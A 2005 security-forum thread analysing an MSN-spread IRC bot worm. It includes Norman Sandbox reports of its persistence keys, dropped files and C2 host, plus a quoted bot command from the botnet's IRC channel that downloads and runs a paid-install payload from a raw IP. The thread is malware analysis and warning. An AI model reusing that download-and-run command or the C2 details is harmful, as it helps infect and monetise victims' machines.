Got a msg from a mate on msn earlier today its a new msn worm like that other one its the same person aswell whos coded it.



Ive downloaded the file renamed it to a .exe used PEiD to find out what it was packed/crypted with its been encrypted with morphine then packed with UPX so i pulled out some magic tools and dumped the original file ive pulled the irc info from it here it is.



This is my first thread so if its in wrong section im sorry Ive attached the original file the .rar password is test DONT open the .exe

-Ash

seems you wanted that'one huh

good work mate, now to go and educate the masses not to click this link. I whish MS would make a script thing to stop external programs pasting into the conversation. Would stop a lot of this happening

I assume it's giving you some sort of false DNS, get a decent Packet Sniffer and track it to the IRC Channel, I myself have manage to obtain lots of this bots (they were mostly Rbot, RxBot) and I tracked down the bot masters.

Yes looks like the same one

Oh well another virus/botnet to mess with

it looks like Kelvir

Norman Scanner Engine 5.82. 1
Sandbox 05.82, dated 27/04-2005

Your message ID (for later reference): 20050531-316

dump.exe : [SANDBOX] contains a security risk - W32/Malware (Signature:
NO_VIRUS)
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO -
REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* **Locates window "NULL [class mIRC]" on desktop.
* File length: 720896 bytes.

[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM\xagwxzy.exe.
* Deletes file 1.

[ Changes to registry ]
* Creates value "System Services"="xagwxzy.exe" in key
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
* Creates value "System Services"="xagwxzy.exe" in key
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices".
* Creates key "HKLM\Software\Microsoft\OLE".
* Sets value "System Services"="xagwxzy.exe" in key
"HKLM\Software\Microsoft\OLE".
* Sets value "System Services"="xagwxzy.exe" in key
"HKLM\System\CurrentControlSet\Control\Lsa".
* Creates value "System Services"="xagwxzy.exe" in key
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
* Creates key "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices".
* Sets value "System Services"="xagwxzy.exe" in key
"HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices".
* Creates key "HKCU\Software\Microsoft\OLE".
* Sets value "System Services"="xagwxzy.exe" in key
"HKCU\Software\Microsoft\OLE".
* Creates key "HKCU\Software\SYSTEM\CurrentControlSet\Control\Lsa".
* Sets value "System Services"="xagwxzy.exe" in key
"HKCU\Software\SYSTEM\CurrentControlSet\Control\Lsa".

[ Network services ]
* Connects to "great.teh-cia.us" on port 57 (TCP).
* Connects to IRC Server.

[ Security issues ]
* Possible backdoor functionality [Authenticate] port 113.

[ Process/window information ]
* Creates a mutex LIQUID.
* Will automatically restart after boot (I'll be back...).


© 2004 Norman ASA. All Rights Reserved.
The material presented is distributed by Norman ASA as an information source
only.

Received 31.May 2005 at 13.31 - processed 31.May 2005 at 13.32.

And in the channel, ##test the topic contained an link for the bots (?download http://67.159.26.109/~tehcia/dd.exe C:\dd.exe 1 -s),


Norman Scanner Engine 5.82. 1
Sandbox 05.82, dated 27/04-2005

Your message ID (for later reference): 20050531-011

dd.exe : Not detected by sandbox (Signature: W32/WinAd.AJ)
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO -
REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Accesses executable file from resource section.
* Creating several executable files on hard-drive.
* File length: 163961 bytes.

[ Changes to filesystem ]
* Creates directory C:\Program Files\Media Access.
* Creates file C:\Program Files\Media Access\MediaAccC.dll.
* Creates file C:\Program Files\Media Access\MediaAccK.exe.
* Creates file C:\Program Files\Media Access\Info.txt.
* Creates file C:\WINDOWS\SYSTEM\ide21201.vxd.

[ Changes to registry ]
* Creates key "HKLM\Software\Media Access".
* Sets value
"param"=& quot;3baf8b1054d0015e8a49b821df2fa3ffe78a3b7aa704cbe1:31303138346238306266626631
66616331356164666535613064363264373962:other::win98:exe"
in key "HKLM\Software\Media Access".
* Sets value "track"="1" in key "HKLM\Software\Media Access".
* Deletes value "Updating" in key "HKLM\Software\Media Access".
* Creates value "Media Access"="C:\ProgramFiles\MediaAccess\MediaAccK.exe"
in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".

[ Process/window information ]
* Attemps to NULL C:\Program Files\Media Access\MediaAccess.exe NULL.
* Creates a mutex MediaAccess.
* Will automatically restart after boot (I'll be back...).
* Creates an event called Registry event.
* Enumerates running processes.
* Enumerates running processes several parses....


© 2004 Norman ASA. All Rights Reserved.
The material presented is distributed by Norman ASA as an information source
only.

cvh: Can you post the link to that sandbox to help me and other users to get info on dodgy files

The owner of the botnet is making the bots download dd.exe and he gets paid for installing the malware/spyware on the computers.

yes ash, this silly thing has been out since the past 2 weeks i believe... and good work there keep it up...

Here you go http://sandbox.norman.no/live_4.html , it was posted in some earlier thread

Has it? Ooo i didnt see no one post nothing so i thought i would.

And thanks cvh for the link i havnt been on a forums a few days and didnt notice the link cheers.

Be careful!

Another one.. No use in making a new topic since I didn't look up any info/analyzed it